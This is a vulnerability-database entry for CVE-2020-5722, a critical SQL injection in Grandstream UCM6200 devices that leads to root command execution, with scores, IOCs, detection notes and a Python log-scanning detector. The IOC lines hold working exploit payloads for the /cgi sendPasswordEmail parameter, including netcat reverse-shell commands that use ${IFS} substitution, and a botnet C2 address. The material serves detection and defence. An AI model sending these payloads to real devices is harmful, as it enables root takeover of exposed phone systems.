cbcvebase.
CVE-2020-5722
published 2020-03-23


Priority P1 · 96 · critical 9.8 · CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-07-28
Exploited in the wild
EPSS: 83.93% (99.7th percentile)
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.

Affected

1 range
Vendor       Product            Version range   Fixed in
grandstream  ucm6200_firmware   < 1.0.19.20     1.0.19.20

Detection & IOCs (extracted from sources)

url: https://<rhost>:8089/cgi
command: action=sendPasswordEmail&user_name=admin' or 1=1--`;`nc${IFS}<lhost>${IFS}<lport>${IFS}-e${IFS}/bin/sh`;`
command: action=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}{{interactsh-url}}`;`
command: admin' or 1=1--`;`nc${IFS}192.168.2.107${IFS}1270${IFS}-e${IFS}/bin/sh`;`
path: /cgi
cookie: TRACKID
path: /tmp/
  • Detect exploitation attempts by monitoring HTTP POST requests to /cgi with action=sendPasswordEmail and SQL injection metacharacters (e.g., ' or 1=1--) in the user_name parameter.
  • The exploit payload uses shell metacharacters injected via popen(): look for backtick-wrapped commands and ${IFS} substitution in HTTP POST body targeting the user_name parameter.
  • Hoaxcalls C2 bot nicks always start with 'XTC|' followed by 9 random characters — use this pattern to detect infected hosts communicating over IRC.
  • Palo Alto Networks threat prevention signatures 57897 and 57892 cover active exploitation of CVE-2020-5722 and CVE-2020-8515 respectively.
  • Shodan query 'ssl:"Grandstream" "Set-Cookie: TRACKID"' identifies internet-exposed Grandstream UCM62xx devices potentially vulnerable to CVE-2020-5722.
  • The Hoaxcalls malware uses XOR key 0xEC (derived from 5 table keys) to encrypt strings; decrypted marker string 'hubnr and vbrxmr was here' at index 0x21 can be used as a memory/binary signature.
  • Monitor for outbound IRC connections to 178.32.148.5 on TCP port 1337 as a C2 beacon indicator for Hoaxcalls-infected devices.
  • The exploit targets the sendPasswordEmail action on the /cgi endpoint over HTTPS port 8089; alert on unauthenticated POST requests to this endpoint from external IPs.
  • The shell metacharacter injection vector (RCE) was inadvertently patched in 1.0.19.20 as a side-effect of fixing CVE-2019-10662; the underlying SQL injection was only fully patched in 1.0.20.17. Devices on 1.0.19.x are still vulnerable to HTML injection via the same endpoint.
  • Hoaxcalls group 2 and 3 samples move propagation out of flooder commands and execute it at startup, and the malicious HTTP requests used differ slightly from group 1 — detection rules should account for all three payload variants.
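Detection logic for the first two notes above (SQL injection metacharacters in user_name on POST /cgi with action=sendPasswordEmail, and the backtick / ${IFS} shell vector), as an added example that is not part of this record or of any vendor signature. The log line format and the sample requests are constructed; the regexes are a starting point, not a vendor rule.

```python
import re
from urllib.parse import unquote_plus

# Patterns from the detection notes: SQL injection metacharacters in user_name,
# popen() shell metacharacters (backtick-wrapped commands) and ${IFS} substitution.
SQLI_RE = re.compile(r"'\s*or\s+\S+\s*=|--", re.IGNORECASE)
SHELL_RE = re.compile(r"`|\$\(")
IFS_RE = re.compile(r"\$\{IFS\}")
CHECKS = [("sqli_metachars", SQLI_RE), ("shell_metachars", SHELL_RE), ("ifs_substitution", IFS_RE)]

def parse_form(body):
    """Decode a form body, splitting only on '&' and the first '=' so that '='
    or ';' inside an injected value ("1=1", "`;`") stays part of the value."""
    fields = {}
    for pair in filter(None, body.split("&")):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def classify_request(method, path, body):
    """Indicators matched by one request; only POST /cgi with action=sendPasswordEmail is in scope."""
    if method != "POST" or path.split("?", 1)[0] != "/cgi":
        return []
    form = parse_form(body)
    if form.get("action") != "sendPasswordEmail":
        return []
    user_name = form.get("user_name", "")
    return [tag for tag, rx in CHECKS if rx.search(user_name)]

def scan_log(lines):
    """Scan constructed log lines '<ts> <src_ip> <method> <path> [<body>]'; return (src_ip, indicators) per hit."""
    alerts = []
    for line in lines:
        parts = line.split(maxsplit=4)
        if len(parts) < 4:
            continue  # malformed line, skip it
        body = parts[4] if len(parts) == 5 else ""
        hits = classify_request(parts[2], parts[3], body)
        if hits:
            alerts.append((parts[1], hits))
    return alerts

# Constructed sample log lines, not real traffic: a benign reset request, an unrelated
# GET, a bare SQL injection probe, and SQLi plus the shell vector with a harmless echo.
SAMPLE_LOG = [
    "2020-03-23T10:00:01Z 198.51.100.20 POST /cgi action=sendPasswordEmail&user_name=alice",
    "2020-03-23T10:00:02Z 198.51.100.21 GET /cgi?action=getInfo",
    "2020-03-23T10:00:03Z 203.0.113.5 POST /cgi action=sendPasswordEmail&user_name=admin'+or+1=1--",
    "2020-03-23T10:00:04Z 203.0.113.6 POST /cgi action=sendPasswordEmail&user_name=admin'+or+1=1--%60;%60echo${IFS}probe%60;%60",
]
```

Running `scan_log(SAMPLE_LOG)` flags only the last two sources; the benign reset and the GET produce no indicators.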

CVSS provenance

Source     Version  Score           Vector
nvd        v3.1     9.8 CRITICAL    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     10.0 CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck           9.8 CRITICAL
cisa                9.8 CRITICAL